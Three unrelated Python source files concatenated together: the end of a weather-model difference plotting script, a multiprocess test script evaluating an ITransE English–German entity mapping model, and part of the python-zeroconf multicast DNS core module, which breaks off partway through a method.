tick_interval=2
clev_number=max_contour-min_contour+1
elif plot_diag=='sp_hum':
min_contour = clevsh_min
max_contour = clevsh_max
cb_label='kg/kg'
main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
and wind (vectors) %s' % h
tick_interval=0.002
clev_number=max_contour-min_contour+0.001
clevs = np.linspace(min_contour, max_contour, clev_number)
clevs = np.linspace(min_contour, max_contour, 32)
#clevs=np.linspace(-10.,10.,32)
# #clevs = np.linspace(-3, 3, 32)
# cont = plt.contourf(x,y,time_cube.data, clevs, cmap=cmap, extend='both')
#cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
lat = time_cube.coord('grid_latitude').points
lon = time_cube.coord('grid_longitude').points
lons, lats = np.meshgrid(lon, lat)
cs = time_cube.coord_system('CoordSystem')
lons,lats = iris.analysis.cartography.unrotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
cont = plt.contourf(lons, lats, time_cube.data, clevs, cmap=cmap, extend='both')
#pdb.set_trace()
cs_lin = plt.contour(lons, lats, height_cube_slice.data, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
x_w,y_w = m(lons_wi, lats_wi)
wind = m.quiver(x_w,y_w, u, v,scale=75, color='#262626' )
qk = plt.quiverkey(wind, 0.1, 0.1, 1, '5 m/s', labelpos='W')
cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
cbar.set_label(time_cube.units, fontsize=10, color='#262626')
cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
file_save_name = '%s_minus_%s_%s_and_%s_%s_hPa_geop_height_and_wind_%s' \
% (experiment_id, diff_id, pp_file_contour, pp_file_contourf, p_level, h)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
plt.title('%s-%s %s' % (str(model_name_convert_legend.main(experiment_id)), str(model_name_convert_legend.main(diff_id)), h))
fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
#fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#plt.show()
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
test_ITransE_lan_mapping_cn.py
|
import sys
import os
new_path = os.path.join(os.path.dirname(__file__), '../../src/ITransE')
sys.path.append(new_path)
from ITransE import ITransE
import time
import multiprocessing
from multiprocessing import Process, Value, Lock, Manager, Array
import numpy as np
from numpy import linalg as LA
fmap = os.path.join(os.path.dirname(__file__), '../../data/CN3l/en_de/en2de_cn.csv')
fmap2 = os.path.join(os.path.dirname(__file__), '../../data/CN3l/en_de/de2en_cn.csv')
fmodel = os.path.join(os.path.dirname(__file__), 'model_ItransE_cn_ed.bin')
ofile1 = os.path.join(os.path.dirname(__file__), '../../results/C_test_en2de_score_I.txt')
ofile4 = os.path.join(os.path.dirname(__file__), '../../results/C_test_de2en_score_I.txt')
ef_map = {}
fe_map = {}
vocab_e = []
vocab_f = []
topK = 10
model = ITransE()
model.load(fmodel)
def seem_hit(x, y):
for i in y:
if x.find(i) > -1 or i.find(x) > -1:
return True
return False
for line in open(fmap):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_e.append(line[0])
if ef_map.get(line[0]) == None:
ef_map[line[0]] = [line[1]]
else:
ef_map[line[0]].append(line[1])
for line in open(fmap2):
line = line.rstrip('\n').split('@@@')
if len(line) != 2:
continue
vocab_f.append(line[0])
if fe_map.get(line[1]) == None:
fe_map[line[1]] = [line[0]]
else:
fe_map[line[1]].append(line[0])
print "Loaded en_de de_en mappings."
#en:...
manager = Manager()
lock1 = Lock()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
cpu_count = multiprocessing.cpu_count()
t0 = time.time()
def test(model, vocab, index, src_lan, tgt_lan, map, score, past_num):
while index.value < len(vocab):
id = index.value
index.value += 1
word = vocab[id]
if id % 100 == 0:
print id ,'/', len(vocab), ' time used ',time.time() - t0
print score
print rank.value
tgt = map.get(word)
cand = model.kNN_entity_name(word, src_lan, tgt_lan, topK)
cand = [x[0] for x in cand]
tmp_score = np.zeros(topK)
hit = False
last_i = 0
cur_rank = None
if tgt == None:
continue
for i in range(len(cand)):
last_i = i
tmp_cand = cand[i]
if hit == False and (seem_hit(tmp_cand, tgt) == True or tmp_cand[0] == word):
hit = True
if hit == True:
tmp_score[i] = 1.0
if cur_rank == None:
cur_rank = i
while last_i < topK:
if hit:
tmp_score[last_i] = 1.0
last_i += 1
if len(score) == 0:
score.append(tmp_score)
else:
with lock1:
score[0] = (score[0] * past_num.value + tmp_score) / (past_num.value + 1.0)
past_num.value += 1
if cur_rank != None:
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
continue
tmp_dist = 2
vec_t = None
vec_s = model.entity_transfer_vec(word, src_lan, tgt_lan)
for tmp_vec in tgt:
tmp_vec_t = model.entity_vec(tmp_vec, tgt_lan)
if tmp_vec_t is None:
continue
cur_dist = LA.norm(tmp_vec_t - vec_s)
if cur_dist < tmp_dist:
tmp_dist = cur_dist
vec_t = tmp_vec_t
if vec_t is None:
continue
cur_rank = model.entity_rank(vec_s, vec_t, tgt_lan)
rank.value = (rank.value * rank_num.value + cur_rank) / (rank_num.value + 1)
rank_num.value += 1
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_e, index, 'en', 'de', ef_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile1, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print('Finished testing en to de')
#de:...
manager = Manager()
past_num = Value('i', 0, lock=True)
score = manager.list()#store hit @ k
rank = Value('d', 0.0, lock=True)
rank_num = Value('i', 0, lock=True)
index = Value('i',0,lock=True)
processes = [Process(target=test, args=(model, vocab_f, index, 'de', 'en', fe_map, score, past_num)) for x in range(cpu_count - 1)]
for p in processes:
p.start()
for p in processes:
p.join()
with open(ofile4, 'w') as fp:
fp.write(str(rank.value) + '\n')
for s in score[0]:
fp.write(str(s) + '\t')
print('Finished testing de to en')
|
_core.py
|
""" Multicast DNS Service Discovery for Python, v0.14-wmcbrine
Copyright 2003 Paul Scott-Murphy, 2014 William McBrine
This module provides a framework for the use of DNS Service Discovery
using IP multicast.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301
USA
"""
import asyncio
import itertools
import logging
import random
import socket
import sys
import threading
from types import TracebackType # noqa # used in type hints
from typing import Awaitable, Dict, List, Optional, Tuple, Type, Union, cast
from ._cache import DNSCache
from ._dns import DNSQuestion, DNSQuestionType
from ._exceptions import NonUniqueNameException, NotRunningException
from ._handlers import (
MulticastOutgoingQueue,
QueryHandler,
RecordManager,
construct_outgoing_multicast_answers,
construct_outgoing_unicast_answers,
)
from ._history import QuestionHistory
from ._logger import QuietLogger, log
from ._protocol.incoming import DNSIncoming
from ._protocol.outgoing import DNSOutgoing
from ._services import ServiceListener
from ._services.browser import ServiceBrowser
from ._services.info import ServiceInfo, instance_name_from_service_info
from ._services.registry import ServiceRegistry
from ._updates import RecordUpdate, RecordUpdateListener
from ._utils.asyncio import (
await_awaitable,
get_running_loop,
run_coro_with_timeout,
shutdown_loop,
wait_event_or_timeout,
)
from ._utils.name import service_type_name
from ._utils.net import (
IPVersion,
InterfaceChoice,
InterfacesType,
autodetect_ip_version,
can_send_to,
create_sockets,
)
from ._utils.time import current_time_millis, millis_to_seconds
from .const import (
_CACHE_CLEANUP_INTERVAL,
_CHECK_TIME,
_CLASS_IN,
_CLASS_UNIQUE,
_FLAGS_AA,
_FLAGS_QR_QUERY,
_FLAGS_QR_RESPONSE,
_MAX_MSG_ABSOLUTE,
_MDNS_ADDR,
_MDNS_ADDR6,
_MDNS_PORT,
_ONE_SECOND,
_REGISTER_TIME,
_STARTUP_TIMEOUT,
_TYPE_PTR,
_UNREGISTER_TIME,
)
_TC_DELAY_RANDOM_INTERVAL = (400, 500)
# The maximum amount of time to delay a multicast
# response in order to aggregate answers
_AGGREGATION_DELAY = 500 # ms
# The maximum amount of time to delay a multicast
# response in order to aggregate answers after
# it has already been delayed to protect the network
# from excessive traffic. We use a shorter time
# window here as we want to _try_ to answer all
# queries in under 1350ms while protecting
# the network from excessive traffic to ensure
# a service info request with two questions
# can be answered in the default timeout of
# 3000ms
_PROTECTED_AGGREGATION_DELAY = 200 # ms
_CLOSE_TIMEOUT = 3000 # ms
_REGISTER_BROADCASTS = 3
class AsyncEngine:
"""An engine wraps sockets in the event loop."""
def __init__(
self,
zeroconf: 'Zeroconf',
listen_socket: Optional[socket.socket],
respond_sockets: List[socket.socket],
) -> None:
self.loop: Optional[asyncio.AbstractEventLoop] = None
self.zc = zeroconf
self.protocols: List[AsyncListener] = []
self.readers: List[asyncio.DatagramTransport] = []
self.senders: List[asyncio.DatagramTransport] = []
self.running_event: Optional[asyncio.Event] = None
self._listen_socket = listen_socket
self._respond_sockets = respond_sockets
self._cleanup_timer: Optional[asyncio.TimerHandle] = None
def setup(self, loop: asyncio.AbstractEventLoop, loop_thread_ready: Optional[threading.Event]) -> None:
"""Set up the instance."""
self.loop = loop
self.running_event = asyncio.Event()
self.loop.create_task(self._async_setup(loop_thread_ready))
async def _async_setup(self, loop_thread_ready: Optional[threading.Event]) -> None:
"""Set up the instance."""
assert self.loop is not None
self._cleanup_timer = self.loop.call_later(
millis_to_seconds(_CACHE_CLEANUP_INTERVAL), self._async_cache_cleanup
)
await self._async_create_endpoints()
assert self.running_event is not None
self.running_event.set()
if loop_thread_ready:
loop_thread_ready.set()
async def _async_create_endpoints(self) -> None:
"""Create endpoints to send and receive."""
assert self.loop is not None
loop = self.loop
reader_sockets = []
sender_sockets = []
if self._listen_socket:
reader_sockets.append(self._listen_socket)
for s in self._respond_sockets:
if s not in reader_sockets:
reader_sockets.append(s)
sender_sockets.append(s)
for s in reader_sockets:
transport, protocol = await loop.create_datagram_endpoint(lambda: AsyncListener(self.zc), sock=s)
self.protocols.append(cast(AsyncListener, protocol))
self.readers.append(cast(asyncio.DatagramTransport, transport))
if s in sender_sockets:
self.senders.append(cast(asyncio.DatagramTransport, transport))
def _async_cache_cleanup(self) -> None:
"""Periodic cache cleanup."""
now = current_time_millis()
self.zc.question_history.async_expire(now)
self.zc.record_manager.async_updates(
now, [RecordUpdate(record, None) for record in self.zc.cache.async_expire(now)]
)
self.zc.record_manager.async_updates_complete()
assert self.loop is not None
self._cleanup_timer = self.loop.call_later(
millis_to_seconds(_CACHE_CLEANUP_INTERVAL), self._async_cache_cleanup
)
async def _async_close(self) -> None:
"""Cancel and wait for the cleanup task to finish."""
self._async_shutdown()
await asyncio.sleep(0) # flush out any call soons
assert self._cleanup_timer is not None
self._cleanup_timer.cancel()
def _async_shutdown(self) -> None:
"""Shutdown transports and sockets."""
for transport in itertools.chain(self.senders, self.readers):
transport.close()
def close(self) -> None:
"""Close from sync context.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `_async_close` cannot be completed.
"""
assert self.loop is not None
# Guard against Zeroconf.close() being called from the eventloop
if get_running_loop() == self.loop:
self._async_shutdown()
return
if not self.loop.is_running():
return
run_coro_with_timeout(self._async_close(), self.loop, _CLOSE_TIMEOUT)
class AsyncListener(asyncio.Protocol, QuietLogger):
"""A Listener is used by this module to listen on the multicast
group to which DNS messages are sent, allowing the implementation
to cache information as it arrives.
It requires registration with an Engine object in order to have
the read() method called when a socket is available for reading."""
__slots__ = ('zc', 'data', 'last_time', 'transport', 'sock_description', '_deferred', '_timers')
def __init__(self, zc: 'Zeroconf') -> None:
self.zc = zc
self.data: Optional[bytes] = None
self.last_time: float = 0
self.transport: Optional[asyncio.DatagramTransport] = None
self.sock_description: Optional[str] = None
self._deferred: Dict[str, List[DNSIncoming]] = {}
self._timers: Dict[str, asyncio.TimerHandle] = {}
super().__init__()
def suppress_duplicate_packet(self, data: bytes, now: float) -> bool:
"""Suppress duplicate packet if the last one was the same in the last second."""
if self.data == data and (now - 1000) < self.last_time:
return True
self.data = data
self.last_time = now
return False
def datagram_received(
self, data: bytes, addrs: Union[Tuple[str, int], Tuple[str, int, int, int]]
) -> None:
assert self.transport is not None
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = ()
data_len = len(data)
if len(addrs) == 2:
# https://github.com/python/mypy/issues/1178
addr, port = addrs # type: ignore
scope = None
else:
# https://github.com/python/mypy/issues/1178
addr, port, flow, scope = addrs # type: ignore
log.debug('IPv6 scope_id %d associated to the receiving interface', scope)
v6_flow_scope = (flow, scope)
now = current_time_millis()
if self.suppress_duplicate_packet(data, now):
# Guard against duplicate packets
log.debug(
'Ignoring duplicate message received from %r:%r [socket %s] (%d bytes) as [%r]',
addr,
port,
self.sock_description,
data_len,
data,
)
return
if data_len > _MAX_MSG_ABSOLUTE:
# Guard against oversized packets to ensure bad implementations cannot overwhelm
# the system.
log.debug(
"Discarding incoming packet with length %s, which is larger "
"than the absolute maximum size of %s",
data_len,
_MAX_MSG_ABSOLUTE,
)
return
msg = DNSIncoming(data, (addr, port), scope, now)
if msg.valid:
log.debug(
'Received from %r:%r [socket %s]: %r (%d bytes) as [%r]',
addr,
port,
self.sock_description,
msg,
data_len,
data,
)
else:
log.debug(
'Received from %r:%r [socket %s]: (%d bytes) [%r]',
addr,
port,
self.sock_description,
data_len,
data,
)
return
if not msg.is_query():
self.zc.handle_response(msg)
return
self.handle_query_or_defer(msg, addr, port, self.transport, v6_flow_scope)
def handle_query_or_defer(
self,
msg: DNSIncoming,
addr: str,
port: int,
transport: asyncio.DatagramTransport,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
"""Deal with incoming query packets. Provides a response if
possible."""
if not msg.truncated:
self._respond_query(msg, addr, port, transport, v6_flow_scope)
return
deferred = self._deferred.setdefault(addr, [])
# If we get the same packet we ignore it
for incoming in reversed(deferred):
if incoming.data == msg.data:
return
deferred.append(msg)
delay = millis_to_seconds(random.randint(*_TC_DELAY_RANDOM_INTERVAL))
assert self.zc.loop is not None
self._cancel_any_timers_for_addr(addr)
self._timers[addr] = self.zc.loop.call_later(
delay, self._respond_query, None, addr, port, transport, v6_flow_scope
)
def _cancel_any_timers_for_addr(self, addr: str) -> None:
"""Cancel any future truncated packet timers for the address."""
if addr in self._timers:
self._timers.pop(addr).cancel()
def _respond_query(
self,
msg: Optional[DNSIncoming],
addr: str,
port: int,
transport: asyncio.DatagramTransport,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
"""Respond to a query and reassemble any truncated deferred packets."""
self._cancel_any_timers_for_addr(addr)
packets = self._deferred.pop(addr, [])
if msg:
packets.append(msg)
self.zc.handle_assembled_query(packets, addr, port, transport, v6_flow_scope)
def error_received(self, exc: Exception) -> None:
"""Likely socket closed or IPv6."""
        # We preformat the message string with the socket as we want
        # log_exception_once to log a warning message once for each
        # different socket in case there are problems with multiple
        # sockets.
        msg_str = f"Error with socket {self.sock_description}: %s"
self.log_exception_once(exc, msg_str, exc)
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.transport = cast(asyncio.DatagramTransport, transport)
sock_name = self.transport.get_extra_info('sockname')
sock_fileno = self.transport.get_extra_info('socket').fileno()
self.sock_description = f"{sock_fileno} ({sock_name})"
def connection_lost(self, exc: Optional[Exception]) -> None:
"""Handle connection lost."""
def async_send_with_transport(
log_debug: bool,
transport: asyncio.DatagramTransport,
packet: bytes,
packet_num: int,
out: DNSOutgoing,
addr: Optional[str],
port: int,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
s = transport.get_extra_info('socket')
ipv6_socket = s.family == socket.AF_INET6
if addr is None:
real_addr = _MDNS_ADDR6 if ipv6_socket else _MDNS_ADDR
else:
real_addr = addr
if not can_send_to(ipv6_socket, real_addr):
return
if log_debug:
log.debug(
'Sending to (%s, %d) via [socket %s (%s)] (%d bytes #%d) %r as %r...',
real_addr,
port or _MDNS_PORT,
s.fileno(),
transport.get_extra_info('sockname'),
len(packet),
packet_num + 1,
out,
packet,
)
# Get flowinfo and scopeid for the IPV6 socket to create a complete IPv6
# address tuple: https://docs.python.org/3.6/library/socket.html#socket-families
if ipv6_socket and not v6_flow_scope:
_, _, sock_flowinfo, sock_scopeid = s.getsockname()
v6_flow_scope = (sock_flowinfo, sock_scopeid)
transport.sendto(packet, (real_addr, port or _MDNS_PORT, *v6_flow_scope))
class Zeroconf(QuietLogger):
"""Implementation of Zeroconf Multicast DNS Service Discovery
Supports registration, unregistration, queries and browsing.
"""
def __init__(
self,
interfaces: InterfacesType = InterfaceChoice.All,
unicast: bool = False,
ip_version: Optional[IPVersion] = None,
apple_p2p: bool = False,
) -> None:
"""Creates an instance of the Zeroconf class, establishing
multicast communications, listening and reaping threads.
:param interfaces: :class:`InterfaceChoice` or a list of IP addresses
(IPv4 and IPv6) and interface indexes (IPv6 only).
IPv6 notes for non-POSIX systems:
* `InterfaceChoice.All` is an alias for `InterfaceChoice.Default`
on Python versions before 3.8.
Also listening on loopback (``::1``) doesn't work, use a real address.
:param ip_version: IP versions to support. If `choice` is a list, the default is detected
from it. Otherwise defaults to V4 only for backward compatibility.
:param apple_p2p: use AWDL interface (only macOS)
"""
if ip_version is None:
ip_version = autodetect_ip_version(interfaces)
self.done = False
if apple_p2p and sys.platform != 'darwin':
raise RuntimeError('Option `apple_p2p` is not supported on non-Apple platforms.')
self.unicast = unicast
listen_socket, respond_sockets = create_sockets(interfaces, unicast, ip_version, apple_p2p=apple_p2p)
log.debug('Listen socket %s, respond sockets %s', listen_socket, respond_sockets)
self.engine = AsyncEngine(self, listen_socket, respond_sockets)
self.browsers: Dict[ServiceListener, ServiceBrowser] = {}
self.registry = ServiceRegistry()
self.cache = DNSCache()
self.question_history = QuestionHistory()
self.query_handler = QueryHandler(self.registry, self.cache, self.question_history)
self.record_manager = RecordManager(self)
self.notify_event: Optional[asyncio.Event] = None
self.loop: Optional[asyncio.AbstractEventLoop] = None
self._loop_thread: Optional[threading.Thread] = None
self._out_queue = MulticastOutgoingQueue(self, 0, _AGGREGATION_DELAY)
self._out_delay_queue = MulticastOutgoingQueue(self, _ONE_SECOND, _PROTECTED_AGGREGATION_DELAY)
self.start()
def start(self) -> None:
"""Start Zeroconf."""
self.loop = get_running_loop()
if self.loop:
self.notify_event = asyncio.Event()
self.engine.setup(self.loop, None)
return
self._start_thread()
def _start_thread(self) -> None:
"""Start a thread with a running event loop."""
loop_thread_ready = threading.Event()
def _run_loop() -> None:
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.notify_event = asyncio.Event()
self.engine.setup(self.loop, loop_thread_ready)
self.loop.run_forever()
self._loop_thread = threading.Thread(target=_run_loop, daemon=True)
self._loop_thread.start()
loop_thread_ready.wait()
async def async_wait_for_start(self) -> None:
"""Wait for start up for actions that require a running Zeroconf instance.
Throws NotRunningException if the instance is not running or could
not be started.
"""
if self.done: # If the instance was shutdown from under us, raise immediately
raise NotRunningException
assert self.engine.running_event is not None
await wait_event_or_timeout(self.engine.running_event, timeout=_STARTUP_TIMEOUT)
if not self.engine.running_event.is_set() or self.done:
raise NotRunningException
@property
def listeners(self) -> List[RecordUpdateListener]:
return self.record_manager.listeners
async def async_wait(self, timeout: float) -> None:
"""Calling task waits for a given number of milliseconds or until notified."""
assert self.notify_event is not None
await wait_event_or_timeout(self.notify_event, timeout=millis_to_seconds(timeout))
def notify_all(self) -> None:
"""Notifies all waiting threads and notify listeners."""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.async_notify_all)
def async_notify_all(self) -> None:
"""Schedule an async_notify_all."""
assert self.notify_event is not None
self.notify_event.set()
self.notify_event.clear()
def get_service_info(
self, type_: str, name: str, timeout: int = 3000, question_type: Optional[DNSQuestionType] = None
) -> Optional[ServiceInfo]:
"""Returns network's service information for a particular
name and type, or None if no service matches by the timeout,
which defaults to 3 seconds."""
info = ServiceInfo(type_, name)
if info.request(self, timeout, question_type):
return info
return None
def add_service_listener(self, type_: str, listener: ServiceListener) -> None:
"""Adds a listener for a particular service type. This object
will then have its add_service and remove_service methods called when
services of that type become available and unavailable."""
self.remove_service_listener(listener)
self.browsers[listener] = ServiceBrowser(self, type_, listener)
def remove_service_listener(self, listener: ServiceListener) -> None:
"""Removes a listener from the set that is currently listening."""
if listener in self.browsers:
self.browsers[listener].cancel()
del self.browsers[listener]
def remove_all_service_listeners(self) -> None:
"""Removes a listener from the set that is currently listening."""
for listener in list(self.browsers):
self.remove_service_listener(listener)
def register_service(
self,
info: ServiceInfo,
ttl: Optional[int] = None,
allow_name_change: bool = False,
cooperating_responders: bool = False,
) -> None:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service. The name of the service may be changed if needed to make
it unique on the network. Additionally multiple cooperating responders
can register the same service on the network for resilience
(if you want this behavior set `cooperating_responders` to `True`).
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `register_service` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
await_awaitable(
self.async_register_service(info, ttl, allow_name_change, cooperating_responders)
),
self.loop,
_REGISTER_TIME * _REGISTER_BROADCASTS,
)
async def async_register_service(
self,
info: ServiceInfo,
ttl: Optional[int] = None,
allow_name_change: bool = False,
cooperating_responders: bool = False,
) -> Awaitable:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service. The name of the service may be changed if needed to make
it unique on the network. Additionally multiple cooperating responders
can register the same service on the network for resilience
(if you want this behavior set `cooperating_responders` to `True`)."""
if ttl is not None:
# ttl argument is used to maintain backward compatibility
# Setting TTLs via ServiceInfo is preferred
info.host_ttl = ttl
info.other_ttl = ttl
await self.async_wait_for_start()
await self.async_check_service(info, allow_name_change, cooperating_responders)
self.registry.async_add(info)
return asyncio.ensure_future(self._async_broadcast_service(info, _REGISTER_TIME, None))
def update_service(self, info: ServiceInfo) -> None:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `async_update_service` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
await_awaitable(self.async_update_service(info)), self.loop, _REGISTER_TIME * _REGISTER_BROADCASTS
)
async def async_update_service(self, info: ServiceInfo) -> Awaitable:
"""Registers service information to the network with a default TTL.
Zeroconf will then respond to requests for information for that
service."""
self.registry.async_update(info)
return asyncio.ensure_future(self._async_broadcast_service(info, _REGISTER_TIME, None))
async def _async_broadcast_service(
self,
info: ServiceInfo,
interval: int,
ttl: Optional[int],
broadcast_addresses: bool = True,
) -> None:
"""Send a broadcasts to announce a service at intervals."""
for i in range(_REGISTER_BROADCASTS):
if i != 0:
await asyncio.sleep(millis_to_seconds(interval))
self.async_send(self.generate_service_broadcast(info, ttl, broadcast_addresses))
def generate_service_broadcast(
self,
info: ServiceInfo,
ttl: Optional[int],
broadcast_addresses: bool = True,
) -> DNSOutgoing:
"""Generate a broadcast to announce a service."""
out = DNSOutgoing(_FLAGS_QR_RESPONSE | _FLAGS_AA)
self._add_broadcast_answer(out, info, ttl, broadcast_addresses)
return out
def generate_service_query(self, info: ServiceInfo) -> DNSOutgoing: # pylint: disable=no-self-use
"""Generate a query to lookup a service."""
out = DNSOutgoing(_FLAGS_QR_QUERY | _FLAGS_AA)
# https://datatracker.ietf.org/doc/html/rfc6762#section-8.1
# Because of the mDNS multicast rate-limiting
# rules, the probes SHOULD be sent as "QU" questions with the unicast-
# response bit set, to allow a defending host to respond immediately
# via unicast, instead of potentially having to wait before replying
# via multicast.
#
# _CLASS_UNIQUE is the "QU" bit
out.add_question(DNSQuestion(info.type, _TYPE_PTR, _CLASS_IN | _CLASS_UNIQUE))
out.add_authorative_answer(info.dns_pointer(created=current_time_millis()))
return out
def _add_broadcast_answer( # pylint: disable=no-self-use
self,
out: DNSOutgoing,
info: ServiceInfo,
override_ttl: Optional[int],
broadcast_addresses: bool = True,
) -> None:
"""Add answers to broadcast a service."""
now = current_time_millis()
other_ttl = info.other_ttl if override_ttl is None else override_ttl
host_ttl = info.host_ttl if override_ttl is None else override_ttl
out.add_answer_at_time(info.dns_pointer(override_ttl=other_ttl, created=now), 0)
out.add_answer_at_time(info.dns_service(override_ttl=host_ttl, created=now), 0)
out.add_answer_at_time(info.dns_text(override_ttl=other_ttl, created=now), 0)
if broadcast_addresses:
for dns_address in info.dns_addresses(override_ttl=host_ttl, created=now):
out.add_answer_at_time(dns_address, 0)
def unregister_service(self, info: ServiceInfo) -> None:
"""Unregister a service.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `async_unregister_service` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
self.async_unregister_service(info), self.loop, _UNREGISTER_TIME * _REGISTER_BROADCASTS
)
async def async_unregister_service(self, info: ServiceInfo) -> Awaitable:
"""Unregister a service."""
self.registry.async_remove(info)
# If another server uses the same addresses, we do not want to send
# goodbye packets for the address records
entries = self.registry.async_get_infos_server(info.server)
broadcast_addresses = not bool(entries)
return asyncio.ensure_future(
self._async_broadcast_service(info, _UNREGISTER_TIME, 0, broadcast_addresses)
)
def generate_unregister_all_services(self) -> Optional[DNSOutgoing]:
"""Generate a DNSOutgoing goodbye for all services and remove them from the registry."""
service_infos = self.registry.async_get_service_infos()
if not service_infos:
return None
out = DNSOutgoing(_FLAGS_QR_RESPONSE | _FLAGS_AA)
for info in service_infos:
self._add_broadcast_answer(out, info, 0)
self.registry.async_remove(service_infos)
return out
async def async_unregister_all_services(self) -> None:
"""Unregister all registered services.
Unlike async_register_service and async_unregister_service, this
method does not return a future and is always expected to be
        awaited since it's only called at shutdown.
"""
# Send Goodbye packets https://datatracker.ietf.org/doc/html/rfc6762#section-10.1
out = self.generate_unregister_all_services()
if not out:
return
for i in range(_REGISTER_BROADCASTS):
if i != 0:
await asyncio.sleep(millis_to_seconds(_UNREGISTER_TIME))
self.async_send(out)
def unregister_all_services(self) -> None:
"""Unregister all registered services.
While it is not expected during normal operation,
this function may raise EventLoopBlocked if the underlying
call to `async_unregister_all_services` cannot be completed.
"""
assert self.loop is not None
run_coro_with_timeout(
self.async_unregister_all_services(), self.loop, _UNREGISTER_TIME * _REGISTER_BROADCASTS
)
async def async_check_service(
self, info: ServiceInfo, allow_name_change: bool, cooperating_responders: bool = False
) -> None:
"""Checks the network for a unique service name, modifying the
ServiceInfo passed in if it is not unique."""
instance_name = instance_name_from_service_info(info)
if cooperating_responders:
return
next_instance_number = 2
next_time = now = current_time_millis()
i = 0
while i < _REGISTER_BROADCASTS:
# check for a name conflict
while self.cache.current_entry_with_name_and_alias(info.type, info.name):
if not allow_name_change:
raise NonUniqueNameException
# change the name and look for a conflict
info.name = f'{instance_name}-{next_instance_number}.{info.type}'
next_instance_number += 1
service_type_name(info.name)
next_time = now
i = 0
if now < next_time:
await self.async_wait(next_time - now)
now = current_time_millis()
continue
self.async_send(self.generate_service_query(info))
i += 1
next_time += _CHECK_TIME
def add_listener(
self, listener: RecordUpdateListener, question: Optional[Union[DNSQuestion, List[DNSQuestion]]]
) -> None:
"""Adds a listener for a given question. The listener will have
its update_record method called when information is available to
answer the question(s).
This function is threadsafe
"""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.record_manager.async_add_listener, listener, question)
def remove_listener(self, listener: RecordUpdateListener) -> None:
"""Removes a listener.
